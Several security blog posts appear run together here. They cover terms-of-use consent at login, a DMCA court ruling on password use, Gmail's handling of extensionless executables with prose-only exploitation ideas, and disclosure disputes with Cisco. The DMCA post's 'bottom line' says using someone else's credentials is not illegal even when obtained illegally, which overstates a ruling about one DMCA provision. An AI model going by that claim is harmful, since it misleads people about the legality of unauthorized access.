Most providers only require a TOU to be read as a precondition of creating an account, with the assumption being that creating an account is a prerequisite to utilizing services. This perceived dependency, in reality, may not exist in a case such as this. Therefore, concern could arise as to whether the TOU is binding upon a person who logs in with another user’s credentials, as this person was never asked to read the TOU.

The solution to this problem? Require agreement to the TOU to log in. This can be in the form of a checkbox, text in the realm used for HTTP authentication, or say… a line or two of text between the input fields and the submit button on a login form:

Logging into this site indicates your agreement to use the services provided according to our terms of use. For more information, please read the agreement [link].

Finally… problem solved. For today. Legal issues are boring, and I’m no superstar lawyer, but not addressing this one could lead to pain down the road… even for non-legal folk.

A federal court recently ruled that using user names and passwords that do not belong to you is not an illegal act according the Digital Millennium Copyright Act (”DMCA”).

InternetCases.com reports:

Plaintiff Egilman maintained a website that was only available to visitors who entered a correct username and password. He had employed such measures so that only certain people (e.g., his students) would have access. Egilman alleged that, without authorization, the defendants obtained the correct username and password combination, and subsequently gained “improper and illegal” access to the site.

The federal court has made the following statement:

the DMCA and the anti-circumvention provision at issue do not target the unauthorized use of a password intentionally issued by plaintiff to another entity

and:

It was irrelevant who provided the username/password combination to the defendant.

So the bottom line is: If someone is using the correct user name and password on a technical device, they are not breaking the law, even if they got the password illegally.

Resources:
Federal Curt decision (pdf)
InternetCases.com

The following Thinking different mini column takes the title literally.
Recently I wrote about a Google vulnerability, and while my main theme was the lack of ability to publish a security issue to Google, the comments were “but this is not exploitable”.

Well, lets put aside for a minute the obvious fact that I actually must convince the user rename the file to .EXE, and lets think about some advisories we already know about.
Hmmm… Does code execution on Internet Explorer when changing extension of .EXE to .JPG ring a bell?
Or maybe using Gmail as a storage facility (hey someone wrote a “deamon” that convert Gmail to NFS !).
I can also use another program that will convert the extension for me…
I can also create a .BAT file that will “extract” from itself the .EXE and execute it…
And of course the list goes on.

So why thinking Different? Because perhaps I cannot (yet) cause the user to execute the .EXE file just by sending an extensionless file, but I just enumerated 4 ways to exploit the situation if that ever happens.

So, I’m thinking that Gmail should either remove this unnecessary check, or add better checking, such as if the content of a file contain a PE execution header.

Actually, why stop with Microsoft Windows executables, when there are COFF (usually Linux ELF) and other execution headers out there? Just because I choose to use Linux doesn’t mean I care less about the security of my machine…

On the surface it seems like in recent weeks people started going full-disclosure on Cisco, surprising them with vulnerabilities reports on bugtraq and friends. I may be wrong and they knew of these ahead of time… If I am forgive me. It seems like “payback time” or “loss of faith” after “Ciscogate”.

This possible trend is more than just disturbing, it’s dangerous to us all when it comes to a company like Cisco… whether they “deserve” it or not is irrelevant. They represent most of the Internet’s infrastructure and that by itself is a problem.

Today when Microsoft truly /wants/ to work with researchers (even if sometimes they don’t act it), the main problem they face is that researchers simply don’t believe in them. They are used to hearing things like:
“This is not a vulnerability”
“Yes, we are already aware of that” (=and that is why you won’t get credit)
And many other responses, although sometimes people don’t even get a response.

Myself, I never had such problems with Microsoft and found them very responsive and serious in their replies.. at least in recent years.. but that’s just my personal experience and that doesn’t count.

With Cisco, it can get worse. Researchers may fear that if they do get a response (or work with PSIRT) it will be with some sort of legal document or a search warrant. Still, Cisco is responsive and I don’t like much the fact of full disclosure where companies actually handle reports and give due credit to researchers.

I suppose only time will tell where this will end, but it seems that much like predicted by Mike Lynn, Raven Alder and myself, exploits with Cisco are going to become a very serious concern in the near future for the infrastructure.

I believe people should give Cisco PSIRT a *chance* before going public with vulnerabilities… but if they don’t I suppose Cisco and everyone else learned a valuable lesson.

What that lesson may be is a whole different blog entry. Not many had a grudge against Cisco before Ciscogate… and lost faith is very difficult to recover.

Gadi Evron,
ge@linuxbox.org.